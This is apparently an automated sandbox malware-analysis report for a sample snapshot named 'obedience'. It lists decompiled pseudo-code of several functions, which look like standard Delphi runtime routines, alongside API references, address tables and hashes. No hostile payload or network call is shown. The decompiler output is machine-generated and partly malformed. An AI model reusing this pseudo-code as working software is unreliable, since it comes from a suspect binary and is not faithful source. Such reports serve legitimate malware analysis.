      0x00442a71
      0x00442a7d
      0x00442a82
      0x00442a88
      0x00442a88
      0x00442a3c
      0x00442a3f
      0x00442a42
      0x00442a4f
      0x00442a4f
      0x00442ab9
      0x00000000
      0x00442abb
      0x00442abb
      0x00442ac1
      0x00442ac4
      0x00442acc
      0x00442ad3
      0x00000000
      0x00000000
      0x00442ada
      0x00442adc
      0x00442ae3
      0x00442ae3
      0x00442ae6
      0x00442aed
      0x00442af0
      0x00442afb
      0x00442afc
      0x00442afd
      0x00442afe
      0x00000000
      0x00442afe
      0x00442ab9
      0x00442a32
      0x004428fe
      0x0044290a
      0x00000000
      0x00000000
      0x00442910
      0x00442915
      0x00442918
      0x00442920
      0x00442923
      0x0044292a
      0x00442930
      0x00442935
      0x00442941
      0x00000000
      0x00000000
      0x00000000
      0x00442941
      0x00442849
      0x00442850
      0x00442855
      0x0044285b
      0x00000000
      0x00000000
      0x0044285d
      0x00442865
      0x00442868
      0x0044286a
      0x00442870
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetDesktopWindow.USER32 ref: 004428AC
      • GetDesktopWindow.USER32 ref: 004429D1
      • SetCursor.USER32(00000000), ref: 00442A26
        • Part of subcall function 0044CDD8: 6F92B5E0.COMCTL32(00000000,?,00442A01), ref: 0044CDF4
        • Part of subcall function 0044CDD8: ShowCursor.USER32(000000FF,00000000,?,00442A01), ref: 0044CE0F
      • SetCursor.USER32(00000000), ref: 00442A11
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Cursor$DesktopWindow$Show
      • String ID:
      • API String ID: 110329033-0
      • Opcode ID: 3daca00d52fd1c33167f487ef72eddb1537db0d0b50adb96641fc27296665b89
      • Instruction ID: 5e718cac9c8d13d13458fbd3ddd84bedf38a8beaf1cce254d608406e1ba6b687
      • Opcode Fuzzy Hash: 3daca00d52fd1c33167f487ef72eddb1537db0d0b50adb96641fc27296665b89
      • Instruction Fuzzy Hash: 6491AF756402028FD350DF6ADAC4E06BBE1BB68308F54847BF904977A6C7B8EC45CB89
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00437E98 Relevance: 6.1, APIs: 4, Instructions: 146windowCOMMON
      Download Yara Rule
      C-Code - Quality: 66%
      			E00437E98(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v5;
				long _v12;
				char _v13;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t35;
				long _t37;
				void* _t47;
				void* _t67;
				void* _t68;
				long _t80;
				void* _t85;
				intOrPtr* _t95;
				intOrPtr _t106;
				void* _t123;
				intOrPtr _t129;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t123 = __edx;
				_t95 = __eax;
				_push(_t129);
				_push(0x43804d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				_t35 = E00404D00(__edx);
				_t130 = _t35;
				if(_t35 != 0) {
					_t37 = E00404F00(__edx);
					_v12 = SendMessageA(E0044B158(_t95), 0x14c, 0xffffffff, _t37);
					__eflags = _v12 - 0xffffffff;
					_v5 = _v12 != 0xffffffff;
					__eflags = _v5;
					if(_v5 != 0) {
						_t47 =  *((intOrPtr*)( *_t95 + 0xcc))();
						__eflags = _t47 - _v12;
						_v13 = _t47 != _v12;
						__eflags =  *((char*)(_t95 + 0x290));
						if( *((char*)(_t95 + 0x290)) != 0) {
							_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x23c)))) + 0x54))();
							__eflags = _t85 + 1;
							if(_t85 + 1 != 0) {
								SendMessageA(E0044B158(_t95), 0x14f, 0, 0);
							}
						}
						SendMessageA(E0044B158(_t95), 0x14e, _v12, 0);
						__eflags =  *((intOrPtr*)(_t95 + 0x276)) - 2;
						if( *((intOrPtr*)(_t95 + 0x276)) - 2 >= 0) {
							 *((intOrPtr*)( *_t95 + 0xd0))();
							E00404A94(_t95 + 0x270, _t123);
						} else {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x23c)))) + 0xc))( &_v24);
							_push(_v28);
							_t67 = E00404D00(_t123);
							_pop(_t68);
							E00404F60(_t68, 0x7fffffff, _t67 + 1);
							E00404D4C( &_v20, _v24, _t123);
							E00444958(_t95, _t95, _v20, _t123);
							E00444928(_t95,  &_v32);
							_push(E00404D00(_v32));
							E00404D00(_t123);
							_t80 = E00407ABC();
							SendMessageA(E0044B158(_t95), 0x142, 0, _t80);
						}
						__eflags = _v13;
						if(__eflags != 0) {
							E00403DF8(_t95, __eflags);
							E00403DF8(_t95, __eflags);
						}
					}
				} else {
					_v5 = 0;
					 *((intOrPtr*)( *_t95 + 0xd0))();
					E00403DF8(_t95, _t130);
				}
				_pop(_t106);
				 *[fs:eax] = _t106;
				_push(0x438054);
				E00404A40( &_v32);
				return E00404A64( &_v28, 3);
			}





















      0x00437e9d
      0x00437e9e
      0x00437e9f
      0x00437ea0
      0x00437ea1
      0x00437ea2
      0x00437ea3
      0x00437ea7
      0x00437ea9
      0x00437ead
      0x00437eae
      0x00437eb3
      0x00437eb6
      0x00437ebb
      0x00437ec0
      0x00437ec2
      0x00437ee7
      0x00437f01
      0x00437f04
      0x00437f08
      0x00437f0c
      0x00437f10
      0x00437f1a
      0x00437f20
      0x00437f23
      0x00437f27
      0x00437f2e
      0x00437f3a
      0x00437f3d
      0x00437f3e
      0x00437f51
      0x00437f51
      0x00437f3e
      0x00437f69
      0x00437f74
      0x00437f76
      0x00437ffb
      0x00438009
      0x00437f78
      0x00437f8a
      0x00437f90
      0x00437f93
      0x00437fa0
      0x00437fa1
      0x00437fae
      0x00437fb8
      0x00437fc2
      0x00437fcf
      0x00437fd2
      0x00437fd8
      0x00437fed
      0x00437fed
      0x0043800e
      0x00438012
      0x0043801a
      0x00438025
      0x00438025
      0x00438012
      0x00437ec4
      0x00437ec4
      0x00437ecf
      0x00437edb
      0x00437edb
      0x0043802c
      0x0043802f
      0x00438032
      0x0043803a
      0x0043804c

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend
      • String ID:
      • API String ID: 3850602802-0
      • Opcode ID: 7b6b19c2b2a154fc7cf38e5b070cb3e144afaff7544f79edd936067099f76a9a
      • Instruction ID: 80eedd5dbe5e322c0a2c1ade7a71e845cd43a75777dc8fee7a3395d8c04566c8
      • Opcode Fuzzy Hash: 7b6b19c2b2a154fc7cf38e5b070cb3e144afaff7544f79edd936067099f76a9a
      • Instruction Fuzzy Hash: 7141A170B042056BD700EB79DC86B9EB769AF89714F20457AF514BB3C2CA389D0AC769
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004102EC Relevance: 6.1, APIs: 4, Instructions: 115COMMON
      Download Yara Rule
      C-Code - Quality: 82%
      			E004102EC(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E00410134(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F27C();
							E00410134(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F284();
							E00410134(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E00410290(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E00410260(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040F28C();
						E00410134(_v780);
						E004104E4(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040EE18();
				return E00410134(_v776);
			}






















      0x004102f8
      0x00410308
      0x0041030f
      0x0041030f
      0x0041031a
      0x00410328
      0x00410337
      0x00410355
      0x00410339
      0x00410344
      0x00410344
      0x00410364
      0x00410370
      0x00410373
      0x00410375
      0x00410376
      0x00410378
      0x0041037e
      0x00410380
      0x0041038f
      0x00410390
      0x0041039a
      0x0041039b
      0x004103a0
      0x004103ab
      0x004103ac
      0x004103b6
      0x004103b7
      0x004103bc
      0x004103d7
      0x004103d9
      0x004103da
      0x004103dd
      0x004103dd
      0x0041037e
      0x004103e6
      0x004103e9
      0x004103eb
      0x004103ec
      0x004103f2
      0x004103f8
      0x004103fa
      0x004103fc
      0x004103ff
      0x00410402
      0x00410402
      0x00410405
      0x00000000
      0x00000000
      0x00000000
      0x00410405
      0x00410405
      0x0041040c
      0x00410417
      0x0041041f
      0x00410426
      0x0041042d
      0x0041042e
      0x00410433
      0x0041043e
      0x0041043e
      0x0041044c
      0x00410450
      0x00410456
      0x00410457
      0x00410467

      APIs
      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041039B
      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004103B7
      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0041042E
      • VariantClear.OLEAUT32(?), ref: 00410457
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ArraySafe$Bound$ClearIndexVariant
      • String ID:
      • API String ID: 920484758-0
      • Opcode ID: e85ecf4578ac51372620a61d19918b7dc21c3ea5ddb8186808ad17ebf1b1af52
      • Instruction ID: 7928089db94cb584507fdb068a9a76f506fac287d53e554137c0142889eb6df4
      • Opcode Fuzzy Hash: e85ecf4578ac51372620a61d19918b7dc21c3ea5ddb8186808ad17ebf1b1af52
      • Instruction Fuzzy Hash: AD411075A0121D9FCB61DB59CC90AC9B3BCAF49314F0041EAE549E7312DA78AFC58F58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040C98C Relevance: 6.1, APIs: 4, Instructions: 108COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E0040C98C(intOrPtr* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v277;
				char _v538;
				char _v794;
				struct _MEMORY_BASIC_INFORMATION _v824;
				char _v828;
				intOrPtr _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				intOrPtr _v848;
				char _v852;
				char* _v856;
				char _v860;
				char _v864;
				char _v1120;
				void* __edi;
				struct HINSTANCE__* _t45;
				intOrPtr _t58;
				struct HINSTANCE__* _t60;
				void* _t78;
				intOrPtr* _t83;
				void* _t94;
				void* _t95;
				void* _t102;

				_t102 = __fp0;
				_t84 = __ecx;
				_t94 = __ecx;
				_t95 = __edx;
				_t83 = __eax;
				VirtualQuery(__edx,  &_v824, 0x1c);
				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
					_t45 =  *0x490664; // 0x400000
					GetModuleFileNameA(_t45,  &_v538, 0x105);
					_v16 = E0040C980(_t95);
				} else {
					_v16 = _t95 - _v824.AllocationBase;
				}
				E00409AA8( &_v277, 0x104, E0040DA70( &_v538, _t84, 0x5c) + 1);
				_v8 = 0x40cb1c;
				_v12 = 0x40cb1c;
				_t91 =  *0x40801c; // 0x408068
				if(E00403D88(_t83, _t91) != 0) {
					_v8 = E00404F00( *((intOrPtr*)(_t83 + 4)));
					_t78 = E00409A44(_v8, _t94);
					if(_t78 != 0) {
						_t91 = _v8;
						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
							_v12 = 0x40cb20;
						}
					}
				}
				_t58 =  *0x48f9a8; // 0x407db4
				_t21 = _t58 + 4; // 0xffea
				_t60 =  *0x490664; // 0x400000
				LoadStringA(E00405EC0(_t60, 0x104, _t91),  *_t21,  &_v794, 0x100);
				E00403B40( *_t83,  &_v1120);
				_v864 =  &_v1120;
				_v860 = 4;
				_v856 =  &_v277;
				_v852 = 6;
				_v848 = _v16;
				_v844 = 5;
				_v840 = _v8;
				_v836 = 6;
				_v832 = _v12;
				_v828 = 6;
				E0040A118(_t94, _a4, _t102, 4,  &_v864);
				return E00409A44(_t94, _t94);
			}






























      0x0040c98c
      0x0040c98c
      0x0040c998
      0x0040c99a
      0x0040c99c
      0x0040c9a8
      0x0040c9b7
      0x0040c9e1
      0x0040c9e7
      0x0040c9f3
      0x0040c9f8
      0x0040c9fe
      0x0040c9fe
      0x0040ca1c
      0x0040ca26
      0x0040ca2e
      0x0040ca33
      0x0040ca40
      0x0040ca4a
      0x0040ca50
      0x0040ca57
      0x0040ca59
      0x0040ca61
      0x0040ca68
      0x0040ca68
      0x0040ca61
      0x0040ca57
      0x0040ca77
      0x0040ca7c
      0x0040ca80
      0x0040ca8b
      0x0040ca98
      0x0040caa3
      0x0040caa9
      0x0040cab6
      0x0040cabc
      0x0040cac6
      0x0040cacc
      0x0040cad6
      0x0040cadc
      0x0040cae6
      0x0040caec
      0x0040cb07
      0x0040cb19

      APIs
      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C9A8
      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C9CC
      • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C9E7
      • LoadStringA.USER32 ref: 0040CA8B
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileModuleName$LoadQueryStringVirtual
      • String ID:
      • API String ID: 3990497365-0
      • Opcode ID: 69d37889808d8cf8d7bfa5b109ecc6159cf0b95448ca72fc4a857b0d2cf15968
      • Instruction ID: 01abf79933815d5844c322c3f75df39bcb1699d5901c2f7fe45156ecf4dfb8e4
      • Opcode Fuzzy Hash: 69d37889808d8cf8d7bfa5b109ecc6159cf0b95448ca72fc4a857b0d2cf15968
      • Instruction Fuzzy Hash: 1F41F9B1A002589FDB11DB69DC85B9EB7B8AB48304F0441FAA508F7291D778AF848F59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040C98A Relevance: 6.1, APIs: 4, Instructions: 107COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E0040C98A(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v277;
				char _v538;
				char _v794;
				struct _MEMORY_BASIC_INFORMATION _v824;
				char _v828;
				intOrPtr _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				intOrPtr _v848;
				char _v852;
				char* _v856;
				char _v860;
				char _v864;
				char _v1120;
				void* __edi;
				struct HINSTANCE__* _t45;
				intOrPtr _t58;
				struct HINSTANCE__* _t60;
				void* _t78;
				intOrPtr* _t84;
				void* _t97;
				void* _t100;
				void* _t114;

				_t86 = __ecx;
				_t97 = __ecx;
				_t100 = __edx;
				_t84 = __eax;
				VirtualQuery(__edx,  &_v824, 0x1c);
				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
					_t45 =  *0x490664; // 0x400000
					GetModuleFileNameA(_t45,  &_v538, 0x105);
					_v16 = E0040C980(_t100);
				} else {
					_v16 = _t100 - _v824.AllocationBase;
				}
				E00409AA8( &_v277, 0x104, E0040DA70( &_v538, _t86, 0x5c) + 1);
				_v8 = 0x40cb1c;
				_v12 = 0x40cb1c;
				_t93 =  *0x40801c; // 0x408068
				if(E00403D88(_t84, _t93) != 0) {
					_v8 = E00404F00( *((intOrPtr*)(_t84 + 4)));
					_t78 = E00409A44(_v8, _t97);
					if(_t78 != 0) {
						_t93 = _v8;
						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
							_v12 = 0x40cb20;
						}
					}
				}
				_t58 =  *0x48f9a8; // 0x407db4
				_t21 = _t58 + 4; // 0xffea
				_t60 =  *0x490664; // 0x400000
				LoadStringA(E00405EC0(_t60, 0x104, _t93),  *_t21,  &_v794, 0x100);
				E00403B40( *_t84,  &_v1120);
				_v864 =  &_v1120;
				_v860 = 4;
				_v856 =  &_v277;
				_v852 = 6;
				_v848 = _v16;
				_v844 = 5;
				_v840 = _v8;
				_v836 = 6;
				_v832 = _v12;
				_v828 = 6;
				E0040A118(_t97, _a4, _t114, 4,  &_v864);
				return E00409A44(_t97, _t97);
			}






























      0x0040c98a
      0x0040c998
      0x0040c99a
      0x0040c99c
      0x0040c9a8
      0x0040c9b7
      0x0040c9e1
      0x0040c9e7
      0x0040c9f3
      0x0040c9f8
      0x0040c9fe
      0x0040c9fe
      0x0040ca1c
      0x0040ca26
      0x0040ca2e
      0x0040ca33
      0x0040ca40
      0x0040ca4a
      0x0040ca50
      0x0040ca57
      0x0040ca59
      0x0040ca61
      0x0040ca68
      0x0040ca68
      0x0040ca61
      0x0040ca57
      0x0040ca77
      0x0040ca7c
      0x0040ca80
      0x0040ca8b
      0x0040ca98
      0x0040caa3
      0x0040caa9
      0x0040cab6
      0x0040cabc
      0x0040cac6
      0x0040cacc
      0x0040cad6
      0x0040cadc
      0x0040cae6
      0x0040caec
      0x0040cb07
      0x0040cb19

      APIs
      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C9A8
      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C9CC
      • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C9E7
      • LoadStringA.USER32 ref: 0040CA8B
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileModuleName$LoadQueryStringVirtual
      • String ID:
      • API String ID: 3990497365-0
      • Opcode ID: 6ec185a326c87704143ca3701e600e979e123bf3cbd2c5c0e3f69ff1c2016a03
      • Instruction ID: 26f77d4a2fb8f7a7cd3c921adda5ecdb1b21b5b1503f4dc78aada34c6c7313cb
      • Opcode Fuzzy Hash: 6ec185a326c87704143ca3701e600e979e123bf3cbd2c5c0e3f69ff1c2016a03
      • Instruction Fuzzy Hash: 4D41FA71A002589FDB11DB69DC85BDEB7F8AB48304F0441FAA508E7291D778AF888F59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040DBEC Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E0040DBEC() {
				char* _v28;
				char _v156;
				short _v414;
				signed short _t16;
				signed int _t18;
				int _t20;
				void* _t22;
				void* _t25;
				int _t26;
				int _t30;
				signed int _t34;
				signed int _t35;
				signed int _t36;
				signed int _t41;
				int* _t43;
				short* _t44;
				void* _t52;

				 *0x490740 = 0x409;
				 *0x490744 = 9;
				 *0x490748 = 1;
				_t16 = GetThreadLocale();
				if(_t16 != 0) {
					 *0x490740 = _t16;
				}
				if(_t16 != 0) {
					 *0x490744 = _t16 & 0x3ff;
					 *0x490748 = (_t16 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x48e110, 0x40dd44, 8 << 2);
				if( *0x48e0c8 != 2) {
					_t18 = GetSystemMetrics(0x4a);
					__eflags = _t18;
					 *0x49074d = _t18 & 0xffffff00 | _t18 != 0x00000000;
					_t20 = GetSystemMetrics(0x2a);
					__eflags = _t20;
					_t35 = _t34 & 0xffffff00 | _t20 != 0x00000000;
					 *0x49074c = _t35;
					__eflags = _t35;
					if(__eflags != 0) {
						return E0040DB74(__eflags, _t52);
					}
				} else {
					_t22 = E0040DBD4();
					if(_t22 != 0) {
						 *0x49074d = 0;
						 *0x49074c = 0;
						return _t22;
					}
					E0040DB74(__eflags, _t52);
					_t41 = 0x20;
					_t25 = E00403724(0x48e110, 0x20, 0x40dd44);
					_t36 = _t34 & 0xffffff00 | __eflags != 0x00000000;
					 *0x49074c = _t36;
					__eflags = _t36;
					if(_t36 != 0) {
						 *0x49074d = 0;
						return _t25;
					}
					_t26 = 0x80;
					_t43 =  &_v156;
					do {
						 *_t43 = _t26;
						_t26 = _t26 + 1;
						_t43 =  &(_t43[0]);
						__eflags = _t26 - 0x100;
					} while (_t26 != 0x100);
					_v28 =  &_v156;
					_t30 =  *0x490740; // 0x409
					GetStringTypeA(_t30, 2, _v28, 0x80,  &_v414);
					_t20 = 0x80;
					_t44 =  &_v414;
					while(1) {
						__eflags =  *_t44 - 2;
						_t41 = _t41 & 0xffffff00 |  *_t44 == 0x00000002;
						 *0x49074d = _t41;
						__eflags = _t41;
						if(_t41 != 0) {
							goto L17;
						}
						_t44 = _t44 + 2;
						_t20 = _t20 - 1;
						__eflags = _t20;
						if(_t20 != 0) {
							continue;
						} else {
							return _t20;
						}
						L18:
					}
				}
				L17:
				return _t20;
				goto L18;
			}




















      0x0040dbf8
      0x0040dc02
      0x0040dc0c
      0x0040dc16
      0x0040dc1d
      0x0040dc1f
      0x0040dc1f
      0x0040dc27
      0x0040dc33
      0x0040dc3f
      0x0040dc3f
      0x0040dc53
      0x0040dc5c
      0x0040dd11
      0x0040dd16
      0x0040dd1b
      0x0040dd22
      0x0040dd27
      0x0040dd29
      0x0040dd2c
      0x0040dd32
      0x0040dd34
      0x00000000
      0x0040dd3c
      0x0040dc62
      0x0040dc62
      0x0040dc69
      0x0040dc6b
      0x0040dc72
      0x00000000
      0x0040dc72
      0x0040dc7f
      0x0040dc8f
      0x0040dc91
      0x0040dc96
      0x0040dc99
      0x0040dc9f
      0x0040dca1
      0x0040dca3
      0x00000000
      0x0040dca3
      0x0040dcaf
      0x0040dcb4
      0x0040dcba
      0x0040dcba
      0x0040dcbc
      0x0040dcbd
      0x0040dcbe
      0x0040dcbe
      0x0040dccb
      0x0040dce0
      0x0040dce6
      0x0040dceb
      0x0040dcf0
      0x0040dcf6
      0x0040dcf6
      0x0040dcfa
      0x0040dcfd
      0x0040dd03
      0x0040dd05
      0x00000000
      0x00000000
      0x0040dd07
      0x0040dd0a
      0x0040dd0a
      0x0040dd0b
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x0040dd0b
      0x0040dcf6
      0x0040dd43
      0x0040dd43
      0x00000000

      APIs
      • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040DCE6
      • GetThreadLocale.KERNEL32 ref: 0040DC16
        • Part of subcall function 0040DB74: GetCPInfo.KERNEL32(00000000,?), ref: 0040DB8D
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
